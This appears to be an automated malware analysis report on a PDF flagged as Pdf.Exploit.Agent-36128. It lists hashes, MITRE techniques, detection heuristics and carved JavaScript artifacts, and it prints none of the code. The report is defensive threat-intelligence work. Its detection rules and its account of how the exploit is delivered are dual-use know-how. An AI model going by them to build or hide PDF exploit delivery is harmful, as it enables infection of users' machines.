Malicious PDF — malware analysis report

Static analysis result for SHA-256 8400220b8d429602…

MALICIOUS

PDF

45.0 KB
MD5: b03c462cd3536382b3270c59f57877a0 SHA-1: d4ca0935a9e24e694cb246aae5ba10d2335adde9 SHA-256: 8400220b8d4296024c01cd5bd26745619a7daeb6a15bae7e88619a4e737bafa1
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The file is identified as malicious by ML classifiers and ClamAV, specifically as Pdf.Exploit.Agent-36128. It contains embedded JavaScript streams which are indicative of exploit code. The JavaScript appears to be heavily obfuscated but its presence and the PDF exploit heuristics strongly suggest it is designed to download and execute a secondary payload, aligning with common exploit delivery techniques.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 4

  • ClamAV: Pdf.Exploit.Agent-36128 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36128
  • ClamAV detection on extracted artifact critical EXTRACTED_FILE_CLAMAV
    ClamAV flagged at least one file extracted from inside this sample. Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator the sample is a delivery vehicle.
  • JavaScript action low PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0008_000.js
fe7e70c8170e5d845ec7a30531b67b4351c564941b79e97944607064c5ef8712		 pdf-javascript-stream PDF /JS object 8 at offset 0x1E7 45305 bytes
javascript_obj0008_001.js
36294b6a5e41e6880e97309242b72e40f4b4b69489c55e0277c0a493c8b7fed4		 pdf-javascript-stream PDF /JS object 8 at offset 0x20A 45555 bytes
Detection
ClamAV: Pdf.Exploit.Agent-36128
Obfuscation or payload: unlikely
legacy_pdfkit_stage_000.js
d6e8b9e2d64e6c9e973b1934b6582d31e937b68be4b4f0b3352ff619a80e394d		 deobfuscated-js double percent-decoded annotation JavaScript at offset 0x1E7 33047 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.